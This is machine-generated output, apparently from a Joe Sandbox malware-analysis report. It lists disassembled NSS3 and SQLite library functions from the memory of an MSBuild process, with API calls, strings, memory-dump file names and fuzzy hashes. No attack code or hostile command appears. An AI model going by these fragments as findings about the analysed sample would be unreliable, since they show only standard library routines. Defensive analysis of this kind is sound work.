PR_WaitCondVar.NSS3 ref: 6C604DD4
PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604DEF

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 0f0b8d8893bf145448c522f18bcf5e382a22ba5aa5ce1c05b1b080fa3f68cf0d
Instruction ID: 55e9934a2c222f6f34eda1f475d8aebd1a9dbcfbdd303bcde61bf68011078f9b
Opcode Fuzzy Hash: 0f0b8d8893bf145448c522f18bcf5e382a22ba5aa5ce1c05b1b080fa3f68cf0d
Instruction Fuzzy Hash: 2941A0B2A04B15CFCB10AF78D28816977F4BF1A314F054679D848E7751EB70D894CB99

Function 6C6B6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C6B6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6CA3

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6B6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B6CD5

Strings

C_DigestInit, xrefs: 6C6B6C61
hSession = 0x%x, xrefs: 6C6B6C7E, 6C6B6C8E
nyl, xrefs: 6C6B6CF4, 6C6B6D1F
(CK_INVALID_HANDLE), xrefs: 6C6B6C9C
pMechanism = 0x%p, xrefs: 6C6B6CD0

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nyl
API String ID: 1003633598-2245374282
Opcode ID: d289dcd846c59b05624c4a6e6a89ed608e31c9f4670eb781bb294a8e36b05912
Instruction ID: b3206297c3f8ebd4db9d088e3950a4fa3b8ee4ce7ba56b45902b2bcec2893dc2
Opcode Fuzzy Hash: d289dcd846c59b05624c4a6e6a89ed608e31c9f4670eb781bb294a8e36b05912
Instruction Fuzzy Hash: 5221F8326011099BDB44DB54EE8DB9E37B5EB4A319F044035E509EBB11DF30EA18CBAA

Function 6C6CECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C6CDE64), ref: 6C6CED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6CED22

Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095

PL_FreeArenaPool.NSS3(?), ref: 6C6CED4A
PL_FinishArenaPool.NSS3(?), ref: 6C6CED6B
PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED38

Part of subcall function 6C604C70: TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
Part of subcall function 6C604C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
Part of subcall function 6C604C70: PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C6CED52
PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6CED83
PL_FreeArenaPool.NSS3(?), ref: 6C6CED95
PL_FinishArenaPool.NSS3(?), ref: 6C6CED9D

Part of subcall function 6C6E64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C6E127C,00000000,00000000,00000000), ref: 6C6E650E

Strings

security, xrefs: 6C6CED06

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 1cd428d155223e9970623e6d45899ac7e37f10972b76b58156aa304d633c90a8
Instruction ID: 26463f0064c30f1e5b99beb5938bef2b393c0a749e0559dc1347070c08092ae6
Opcode Fuzzy Hash: 1cd428d155223e9970623e6d45899ac7e37f10972b76b58156aa304d633c90a8
Instruction Fuzzy Hash: 2E116D72A052186BD6205725AC46BBF72B8FF0670CF000835E80062E41FB20B60CC6EF

Function 6C6F4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C6F4DCB

Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C6F4DE1

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C6F4DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6F4E59

Part of subcall function 6C6DFAB0: free.MOZGLUE(?,-00000001,?,?,6C67F673,00000000,00000000), ref: 6C6DFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7B300C,00000000), ref: 6C6F4EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C6F4EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C6F4F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6F521A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
Instruction ID: cd6453475adced8f94616042edeca1c43828f887b22e98b34df748f9a23904a8
Opcode Fuzzy Hash: f440ba8f4fc78864505f031f631068b8ca36709c14f3ea30abc9f25994da40f7
Instruction Fuzzy Hash: A7F1AE71E05209CFDB04CF54D8407ADB7B2BF85318F258129D925ABB81EB75ED82CB98

Function 6C672D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C672D69

Strings

winTruncate2, xrefs: 6C672EF8
@yl, xrefs: 6C672E24
yl, xrefs: 6C672DD0
winSeekFile, xrefs: 6C672E9C
Pyl, xrefs: 6C672E74, 6C672EC5, 6C672F32, 6C672F5C
winUnmapfile1, xrefs: 6C672F55
winUnmapfile2, xrefs: 6C672F7F
winTruncate1, xrefs: 6C672EBE

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: __allrem
String ID: @yl$Pyl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$yl
API String ID: 2933888876-3732613124
Opcode ID: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
Instruction ID: ddc0265b9eb2310d688b777a6885aeaac13a8f5906a2d98496ad10cf45ab69ff
Opcode Fuzzy Hash: 8918ac5ca46dc110fd8446568dcea3d0517594c23ca81e214ed6fde92913e581
Instruction Fuzzy Hash: 2461BF71B00205DFDB54CF68DC88AAA77B1FF49314F208A39E9159B780DB31AD06CBA5

Function 6C602400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6024EC
sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C602315), ref: 6C60254F
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C602315), ref: 6C60256C

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6024F4, 6C602557
bind on a busy prepared statement: [%s], xrefs: 6C6024E6
%s at line %d of [%.10s], xrefs: 6C602566
API called with finalized prepared statement, xrefs: 6C602543, 6C60254D
API called with NULL prepared statement, xrefs: 6C60253C
misuse, xrefs: 6C602561

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
API String ID: 632333372-2222229625
Opcode ID: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
Instruction ID: e415ff6fb4cbe6f5845c0f43a6a161f799d9062064432d065a946a0b28b2d694
Opcode Fuzzy Hash: 37841d7be042d7f6efa236749f91238b5b467433d75e5e99642db69322429843
Instruction Fuzzy Hash: 0D4125717006018BE7188F19DE98BA773B6AF8631DF14097CE8066FB40DB36E815C799

Function 6C6DA470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6DA4A6

Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4

PORT_Alloc_Util.NSS3(?), ref: 6C6DA4EC

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C6DA527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C6DA56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C6DA583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C6DA596
free.MOZGLUE(?), ref: 6C6DA5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6DA5B6

Strings

^jil, xrefs: 6C6DA475

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID: ^jil
API String ID: 3906949479-3219985638
Opcode ID: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
Instruction ID: 37f0cabc3af0d6b44ca1d2112559b23484c2ed1717c84ff91e41fc4a626fd998
Opcode Fuzzy Hash: 71d21cd2771874ab30f7478bf6a6a1fe5524277662f5bfc2a24f9ef7a6c2b2d5
Instruction Fuzzy Hash: 2D410635A093469FDB00CF59CC44B9ABBB2BF84308F19C468D8595BB42EB31F919C7A5

Function 6C686DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C687D8F,6C687D8F,?,?), ref: 6C686DC8

Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C6DFE08
Part of subcall function 6C6DFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C6DFE1D
Part of subcall function 6C6DFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C6DFE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C687D8F,?,?), ref: 6C686DD5

Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E10F3
Part of subcall function 6C6E10C0: EnterCriticalSection.KERNEL32(?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E110C
Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1141
Part of subcall function 6C6E10C0: PR_Unlock.NSS3(?,?,?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E1182
Part of subcall function 6C6E10C0: TlsGetValue.KERNEL32(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FA0,00000000,?,?,?,?,6C687D8F,?,?), ref: 6C686DF7

Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686E35

Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C6DFE29
Part of subcall function 6C6DFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C6DFE3D
Part of subcall function 6C6DFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C6DFE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686E4C

Part of subcall function 6C6E10C0: PL_ArenaAllocate.NSS3(?,6C688802,00000000,00000008,?,6C67EF74,00000000), ref: 6C6E116E

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686E82

Part of subcall function 6C686AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C68B21D,00000000,00000000,6C68B219,?,6C686BFB,00000000,?,00000000,00000000,?,?,?,6C68B21D), ref: 6C686B01
Part of subcall function 6C686AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C686B8A

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C686F1E
PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C686F35
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C7A8FE0,00000000), ref: 6C686F6B
PR_SetError.NSS3(FFFFE005,00000000,6C687D8F,?,?), ref: 6C686FE1

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 587344769-0
Opcode ID: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
Instruction ID: 43de3eafffd6af768d4f82884978984307bf16cd3a6e1f212052eb5731831623
Opcode Fuzzy Hash: e77d0ef98c73a1a85aefd1435f22b43b5ff4480a33113817da5738ed85fd1fd3
Instruction Fuzzy Hash: 3271B471E212469FDB00CF55CD40BAABBA5FF95308F154229E818DBB11F770EA94CBA4

Function 6C6CADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEF1
free.MOZGLUE(6C6ACDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?), ref: 6C6CAF0B
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAF30

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValuefree$memset
String ID:
API String ID: 161582014-0
Opcode ID: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
Instruction ID: 0ebdc46813fe7013629e82434c2ea7a4619c0931b1f194d9a2f487106b974de3
Opcode Fuzzy Hash: 8cc601312a1df8bc355db320d417b4a0ab49ff76f140f9b9115c73383b4afff9
Instruction Fuzzy Hash: 1D51B1B1A00601AFDB00DF29D889B55B7B4FF09318F144665E81897F12E731F865DBD6

Function 6C6A4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CB4
EnterCriticalSection.KERNEL32(0000001C,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CC8
TlsGetValue.KERNEL32(?,6C6AAB7F,?,00000000,?), ref: 6C6A4CE0
EnterCriticalSection.KERNEL32(?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4CF4
PL_HashTableLookup.NSS3(?,?,?,6C6AAB7F,?,00000000,?), ref: 6C6A4D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C6A4D10

Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4

PR_Now.NSS3(?,00000000,?), ref: 6C6A4D26

Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C6A4D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C6A4DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C6A4E02

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
Instruction ID: 9f8c39fc6e21279cf98770f83d5c0338f015570bdc1b0d85451fabe99003b4e8
Opcode Fuzzy Hash: e838d87b6f3329398005b1c15fcd0f6e979b58fcb0ae2b2421e79ce1d3d73cd6
Instruction Fuzzy Hash: 5841A4B5900601AFEB00AF68EC4596677A8AF0635DF144171EC08C7B12EF71ED15C7AA

Function 6C6E4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6E536F,00000022,?,?,00000000,?), ref: 6C6E4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6E4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6E4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6E4FAE
free.MOZGLUE(?), ref: 6C6E4FC8

Strings

%s=%s, xrefs: 6C6E4F89
%s=%c%s%c, xrefs: 6C6E4FA9
oSnl", xrefs: 6C6E4DFB, 6C6E4EF4, 6C6E4EC5

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSnl"
API String ID: 2709355791-1652504446
Opcode ID: 6c88e3e632746098d102797c13408b1a088aa68b090a963023b8ce0505060deb
